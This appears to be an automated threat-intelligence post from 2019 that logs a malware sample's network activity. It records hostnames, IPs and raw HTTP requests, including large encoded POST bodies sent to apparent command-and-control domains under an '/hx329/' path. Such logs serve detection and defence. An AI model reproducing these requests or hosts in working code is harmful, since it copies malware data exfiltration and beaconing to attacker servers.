SggPbvYnwU4S9xIQh4oNAQVAMGGjfFFEzbn1jqShRFwvP_7J0shOAq9aizloDANZ1aGbdjvGYtnk(YbWJ4DBypfB9vinPRaowRBGfB6toGnqID4KpF0RmyUFfL8Nj6Oke9EpvFKAYoXQ(-msjHKT660XzHR3wHjlXEv42VonykoYT3MaFivUTrN2nNn5RuE4AkkzhMVcqJ384jsA~ekkOtPBflomsbV9LCxlMbOCyLaS8LQsArqJaid7QIRuk8Gr~2NjdqEzou8hMZvFmqxjdgo8plp0RspJKwUlsQw88kf3TSXECd60iasAk6bD0PeDdR0iQFNZM7U87dHAQsCMhzmv8A816NyNRNrGjkZQVKpIfuFrRUas\x00\x00\x00\x00\x00\x00\x00\x00
http://www.doamensdressshoesok.live/hx329/
- Hostname: www.doamensdressshoesok.live
- IP Address: 54.70.177.61
- Port: 80
- Count: 1
POST /hx329/ HTTP/1.1 Host: www.doamensdressshoesok.live Connection: close Content-Length: 57166 Cache-Control: no-cache Origin: http://www.doamensdressshoesok.live User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.doamensdressshoesok.live/hx329/ Accept-Language: en-US Accept-Encoding: gzip, deflate GzuX=vooYcEf6JzYrrKhNNh0WL3KvbANYrI73UWQ7OSo4ZltYR-mE52wWQE8pCBKB2jUPptTRWJYbUXesONeGO-DaRtp61NCvmYs-InjVUn(IgctYJHAkMmcF7RNKMBXNvMqXA9ItkqQS4ZZr7aWszEETIM6IkhMhANMP4wqfexHdmdLpg6PB0gn4EK70GGNpyHeL0eIZ3HehzTsasBJrzZsGzRuwGX1MAgNIXqOcSylUMn7eV_IoSGun2qnzwXOugj6LUSlz0EO5gLp0jrWHgFcXFN6SORjp80mSthsfKr5vAEqM4DIZK8Xl4m79SOS0ZuJMmoyHN9rqxfx6ijM3k5eJCbA7sBklB6fDy8dbaibbMwCb(QEQLauijVZN8VuPu6CI7M79mzu2xQSsYesJ0M6E(7Zm4Ymh2c(2S2nzdujm6oKG5WEUfh5ZPYL0dhej8cMIrLfiBAfC4KipMuGWqEBEMDazX8R3Qn4hGdHIYTIkxfkWLqI9uxx_SHuysJVMs7uFo-t6GvBEXu1GPkqAoDlwZFoOct6fxnQd80tnfdMMRkBvrDR1gRYaSsaqa0Dvctcy0UJ3RCsG(qLFBa6bdfOA6wrfXMi1bK8cR8fi9GHeeLMRRknEBxYk8W8IvxhwIT4w5ruXyvotNZn3IWtq7AMzXfVOuHUEr-lKJptNMlfdzrHRgpZIjrteIpDhVtuVADYBcRoPxACZ1BEoPwWiEzED1TzRfKo1iTRb51goMmKV1_F9TrNhIsNjBifdWFYu08tk7iKbIAu1N7QoKDI6mYgDkO168EKzw7ir7xaesy6xhmCwupEfvrZVhhkeBXLumwgo6d5-6fqnR3gvdp7DU-0ohL4LoV0nGTsQ~sQw2iaG7l(LKgT53XBZjWkvrA(_OsbRwYtrZfN4WTzAOMHBiDHCmx2Se16AW5HDdtLK~325aI~Pq_UnhYpZWnQ99gwWmoKItrXZve8mGXe9pyKF~sPo47wOxNwHl1q4(AQVOLgubDwiKP9o0rygwK6v7Ayl(_pHJIGq6DcC3SpnNS49kyIRcBcOBWF_xhYsWJJWZQ~_yXWr3qoILZksekYbIUS_Kojn47phI_q6S004gkzpl8atRyO6ZEi0oey6mHQ_ioGhJgjIthg4jONSZIjXbeJGjbc9isCzLRpwZIharldJj3fLa2DxwrwLH0trOw0BSdU9MEnMW-ZAbIPly3ZbP4KTV8ooqyycYAz7h3TlO115C-iTIoiETCpnhX1a3u698kQ15wHvxKn0T2QUVlyw5h4cmF6_M_fHW1EF0ORYLdhP3umJXnUaO9nIpM6fuOottrDSsmhvtZ(UH01m682asayO~VekVXSsO7f62C1fH6U-JaccZrlbVWLdXJRGjfP_NpsO9BYSneYDpOLRhum0xfsPXfmE~VaPDI2zt3~SR33ods26V3Xr~DtVwlhPdJ(FEnLVLU93vrIr6FK38HkWGw~DlK5eMRTJGiGqPNH6hoSom2msKXwPeYDhsGAcHrzKmKsInUuFDZ02QGEXhujDY_QzlxEzwEi-Lnyyjq0ZEF3oZNZVe0CPWvd3vqdsktpcHg8O0_NbC4SSscrAseIlw7mI83hIMNX8nElTtJvAtDmy4LqwHtjloTnJoYrndz88YRQgdrC-4U(f0naJdu58wGcNFhDJTDUbvemRSQLGycWVk6AyX-n4Fnt0NlN0tOHABNtLL9MXFM4c8HhINqiqAmOsKSNo73jfOKI_D7b-sysaKr8BTHoYzogj5CXCsP6gcSsF(yEOhumxW5Y6gH75M-4-utCX7gqCuArVz4ngzNQzBvFijEm2R08SYM0zzRM2qixFn7AUQzlyLH6iElZGw6(Mo6~QJkInK9zS49dOLpFR1jp6JxVx2aa0Qw3icY(a2fftG5CT0aPA9uKtJhaayxU1HSScwVSrAhEo9gd3lwMHArENt8PNaM8IqHm8UIvM2-ufigbU88wR6QRh73n8X0XRmFkYtyYdOEBJAxLRbrw5mNbkYqFfFGQLhN9LmqDFpiQJj807dqPbQQAbs6RJdhBZR-W2(vK3(7MmBaP5VGVREbNtjuW-~lUOWLlwrLt6WMyo(503TQ1elHp0ZqodKgwK2Tw04TfEVnXJOsGxlYgkuqWp6aimDC0uWDhjU6Yr77DbG7eLzAepgjcj7O3sZtHb4BthUsseEKtLBSH2AuFdlVHFwoL4mGQOjnhlHx3HZQ4EyiZAQL3nIXVLRdYixLxH5l1j54bdQHWdZKLrFyZ5HtVyGcrcu8be2YtrXEER16JZ4rVo7oGm(RrEFgcBiTE3Pvr7fa88xxc0pvIPxssLLtfdP1HbHEEu7GcRHyprikjS5Hd-6CrckBzk9-87t7Kkywn35W1QPh
http://www.yheeee.com/hx329/?GzuX=/+eWJHc7ouCsXwy3w5/VAkCueLXbW0w075lArABbWyTiT/0rBn4EXH4ISPnZFipT1sUyeclS&AnB=O0DXNTu0N0
- Hostname: www.yheeee.com
- IP Address: 47.88.84.51
- Port: 80
- Count: 1
GET /hx329/?GzuX=/+eWJHc7ouCsXwy3w5/VAkCueLXbW0w075lArABbWyTiT/0rBn4EXH4ISPnZFipT1sUyeclS&AnB=O0DXNTu0N0 HTTP/1.1 Host: www.yheeee.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.yheeee.com/hx329/
- Hostname: www.yheeee.com
- IP Address: 47.88.84.51
- Port: 80
- Count: 1
POST /hx329/ HTTP/1.1 Host: www.yheeee.com Connection: close Content-Length: 2198 Cache-Control: no-cache Origin: http://www.yheeee.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.yheeee.com/hx329/ Accept-Language: en-US Accept-Encoding: gzip, deflate GzuX=3cSsXjlHzvezG3C5s5qoXhi_SeuJf0ISgNYo3CNLSCLce6EQERVIOnxger3YFRJjstdOcZYDsW1zsZ7vzRtJxq7D9g7p6EXkLzoOQzRntPGgI4K77r78o7uBdGiGWsTj1lQld9id1nKZ4XqzYW2EVWugKWjD8q5j1l30VGwtyjl5MXinfVHddfXqz2ehXfn0UfaB1O4YwWbtAVi1NNwEzD2bfFSr(qiwWXv5pfxQY5kB2h4GYf3AXo0rOBjyGTRQvgIxlTW-yl84MWXYiTHIG4FLDe7cybuyKt(BiB(7PjKEvPLiNR~aG-Av5dZ0mDgfmKyawOYzYDxY3MCHejHwA09x5-mDkPaUszdUGEGwjJsB~bxfzYhYBbhmZHLEAnnBgCxIhxwHa2q_z0R9zfxkBZxUuCNjqsntVPtXx0A9GLvfPoPMeHzfbyYIC20ZK6cXCfMXXZnfbdAQvQTvnrdyf14pBAZc5LYF56(_XRJtc75QzaXackZ13A7DkHySnjMTdCRFLndJX9rEkuT4b5W7RLy7GOJ-pS71uzfCBoUG3BIiWSQ4d_CtJIvQS6fdd0dnyOJZBzuBQGEjjVfOffrRGhHD0tNloNECZ1Eb3uxdXNvE2jN9QaODHK2S5ofPLEKMiuejP8pvNalZzD~t9XZM6c7xZ8pGbGOG3kqMHKP5k6I73SWI~wn3W2VbfcqKpHOtQdtDYULYo_a7mhUvUcxumORMIkeJuGGx~kd6FP7eCajWiu8g~XhGdxWsBJpLzIwDzZ2I7-Upnaviv806QmHCBYzJ3gTugq8-jU7eFGdrp0ZWcAIU7RoIhX4Jqb79VDcTZv9wT_PxzRQPjc6urGI3B-HzJDqH0V5dLcQYMyZmr_RJvVARYmHBbeGlPyJxLBC9WKf9LwxcWo5ZGXVLDhYyJ-YDp0hNreZLp59TxmBPg9nBdKRCyACMHAounR0lLv4mNfKtAopWlhNygXSxhfq8~zlUieekUsFN(8USf-BCiZDn7CZPPK9APeDkyQ2NA4Pp57Lm8XmOMKrDtdLKpDn1fWTz8e5pAGiII2mERcgD0gXNQS8OhRMYmgs-fxSNOtFVuWi-pPXRI7(kJEkxsLFk7TW07b7VHDLnqfCKvdz2(C5jbD0GA9HhKt4eMpZ96UXpvhYHlbN46eJIAZn8BqF3bpuuYF6CVhcrF7n0d7z0qrKvcWqEx5LB5lc0igKQzWuK(9xyFmnj~oCK9_36DweKcW7buhQxBpEkIRXFbvO7JW4BQtL6YQriArLzipHA(JQ2T9W7TT1XjfweNv59TRW9V-ePhjyq0DSw282ks58PjRrhfW70rT3cSajdRcVnRL5saY13hFF0yoLd0BVOcmy-m8WrbWS9kH(wF2d7VmCTLE8shvI1AgWldAArDj8Gt41CHkFTsdFvVnyPO1dRVDmr9eISMwBdQBEsA-ru9J5GqI(uo13ICYICfN~F(4LUsSTHySYH50trkxquiiRjzY5S(YT7A4P-f1CF6VFHdEja5_GntRnxhjiIlpND~cQAiEWB~GuvTPOmw3LTaxuk5irLjpxKBLYg(xezpXNyyrsRNbI_jb(11uCRi3DfxFnjLPQbM1Ml(mUvWioSscoQidVfKoAy~mPa45G6vWrRxMJV0WfJ6amczJdE7HaNDvKwrS0wOP1m20Y5palXbcf9dG7YHmu8z6TJHseAmUe5kA2h9kavxHUzKUtWKrnv(UufvNPLp7k7ps8V5wHcmV(aaiDWvLsbhgEPkrLxci1KD7OtiiVEyNXH9Vx1JtassGm7MUl6LZC20bMOERTJh4qwDckhw-mhsq1H(qiQjsTStfAb5IPxVy4aUIbwE50A1nnu1SkeW-4s~PV8i2r_rkfvK8xGAk0gejEoojzUkhHb5h~Tp56i329juoHsnTQnFk4w01uedcLXfGTfc_6N8tg0GE7YnNc3IXm8QdDdVpjaSvNeLAXUcotSBSpMpK9EcTwVYU6QKbHRNblu2tkzsVwgwAoah247OvE1cDIBLmQpO6rbtenAnf(-hSqnVb00fxiQ86OewCnnOS68BYVGvdZPl9JE5IRwcavwQZutRq3SBP9NDAWeocF5CEP7Fx5utZISYbzc(B9hPzUugyBY2V2nG-bO9K0VZrL_xGgeW7M_lz6oVTLRwRnETvc6EeWRmOqGb_IRRXKQx1d6okKc\x0087dHAQs
http://www.yheeee.com/hx329/
- Hostname: www.yheeee.com
- IP Address: 47.88.84.51
- Port: 80
- Count: 1
POST /hx329/ HTTP/1.1 Host: www.yheeee.com Connection: close Content-Length: 57166 Cache-Control: no-cache Origin: http://www.yheeee.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.yheeee.com/hx329/ Accept-Language: en-US Accept-Encoding: gzip, deflate GzuX=3cSsXmUh8_amC1bD6Nm4SCKOaOjIBXYtt-QS3C91dmP0ZaUQGS9FAnxjKb3XSBFXldlGcb0psW9wnYKn6UAJtq2y(g~3rXvlLQVfAipnwPyiMai89aHon6WDWkiTc-ax3H85a8C1~GCS3VSfewKyRWqjTnnB9L130nfaJ2o-4CB7AU6FfUSrT_mQhV~KaMPCGs2B2-wI~0TvO3atA-YT2yGhI0jtxZqzVVGk0u1ja4878RJxY_zxX4FLWSCqGC4MslYpmxTA~2wkDn3Olwr6HLdhEdbc8rO0NvX_(x(QNiiYmvKVNR6CcpxW39Zy7QUA3aaCpfp2a2VY3qmQXBfJZU9-0O3Vh9OfszNAH0Owsv8B57he1ohYULhzZHL2Ann4gBBUzh4HNFu9yG1z7stmF5xIvAlDuoeEVI51wVs9VqfeKMrQJiTeUXRNLW8zK6QaDd0LT7CBadAXkAn8w6dmWFIAZwhn~rMv5ab6XyZpd49E46DgKmVpzxL0gEGKq28odi1_JGxxDO7ekdbYZYj6bqOEIpY75DLaqB(jA5QS4ih4LiNuaM2LCMKOYpzbW0hi6fReJg~IXGYK0Ui2c9XzCzvrwNBTgvFlQ0MrzOZoSqmmtC49SJ7lMJ(r2qbzCGWN3bilSOBEK94JrBOl1UJsnPjRL4ATeCDs5l~nAoaTzplL9mOAlwzDc0dhZJugvnnAL905UTnF7NrJiTofQsF0j-5tWH3KtxCM~lJ2E_(eFaXWmtkj5wVdTBWqFJpt3I8tzbWU6_gphonau7UkaUa6FYyExkDhkqcqjWXwXXgUt3ZXQiAQ4RoLjz4i6rn4NiM5afpgZtbf7zolot6r5yJ-KdPZLjmKjWs9ft8eJARMleZVgWseenfZU_WOBTRmAEioV6vhchVlcOVSVkd9DEhhWPlnwz0XoNh7jpE5jWkcqvieE69W0QeUNyZomlpkNOE6Ptv1V58fuxAs6TyBlcWR(mBnh4CeMYhG1vcIZJNvlIKF8jQGArRrA8zC9TG7Ga(z2rvw1AbuOZXmuOHc9iPoLwXXwuMdJX2oChSvCcIy2238SklV8RAwnB0Afj~sEvlFiB2xkd32NZOaNwlIkKgB9TfQ9LjODEftqbH7v5728yxjaU4GIcr2H80MM-gq3lju(3oWj5lnp8B7EYbhKrsKd4fPSX2xfG8IHKfaM4DTquWvc1iR76OR4kQj0wCEwlncyrhmcmjKmMGQ1dmBOm21KUKMsVcaB5UtARq4aqjFJDB8VMTVbW(VP7Phu5PWzpE_b-utYCxQqY0KLcV7EX~Le-mppgvowh~4m9Ojj6ss1G3JT0emrGqVacO9Xt1iYZ1yN4ZQzExI(637xiJaXDXR(6XTVxTH7ErKPDsnUFS4bFhho-d3fi2sahJxRiBf~aRtK1xA7b5CTnW9ElZaTgm-2OEKSggYEQUrXuXW7YV25PCFjGzdELYoYN(dm4jm6hzHyW0Lz0Ri2y~0iTRajtNzvYL-La3Wc0PDilRcagHX(cGzkQnTrz71npdt6ccixB2AoXKBR8u7xA2EPxSk7yKZuIg2Avs07BP_vU9-4LMJNdQ4i6H6hOGWmXX4iASCb_0iJ10Qins9AGUwgPQQ4Y0XAK4m9lLE5-bxhQ7C7b5rzmDV4IiY1p8n3WuLOujtuwM1KPhewUUbgdFhXeH4SG3zNn(w~qTTENKtnkSrkFDf63SoxDYwEl0HK52skhCIsPHDucoTqMdS(CHfp33vPzz1weN23FcXkIDfdFA3WpaWjQtslKjl4nZkKefUt3uibW0zDIODwasZIzPr6quxEYUM6fLphY1W9Iu6ks6_kcpO1uSxQHcwXJ3zMJpJvFGE9CIrQL8k7Md_kEP_uBLkMcNuLlsIWDJcmyyrzE6m~DmgodPTjWZuusSCvDQVRhtXsAavIvPzLXHiEe28xLEyPUjY~_YBDG~Vb6b2YKSDC-lXKnfVVKdQSFpSsbZRcHM4OA6vC5rcUu9wz9Z5nVkyxCtaq3QTMKsRcCgoHEU1KKvehPeamo3jhDGeT8dPfCisg7CmuDDWc3HJAsU0rZRtxttH8ahhdK(CHq2zAKaRJsdjNCC9pMZkKhL7TilB9dAtVsbUonZZMG9Stw1diG76c-H5zaAOco7zzEk4dqxpjRyveU~RzyPCDq8XRtb7nbeaDZYwUEnguCtvljDbhFubYNtKz5mr2U6q7_nIGefpYpCB8OBoeGK4MXVI~rnOITPIq0a25QnsYVl47PNT5EnhZXaT6iq9DhBmQLF3XYCvCGUabMatfDJsvKuVHRTV3pH_(kls7_uotQtNZNLdYbX4rf6hxHJjeRGnuCIfIUWhEYjB4MppFB7829RrXQ8nZnsTHuUOReVfcdNm2REWXxAY73tNCZAEJrx9Y7BU~FeEEkFCJhkJ8cN1
Detected family: #Malicious
TheSystem Itself @ 2019-08-07 20:48:02
#infosec #automation
TheSystem Itself @ 2019-08-07 20:39:08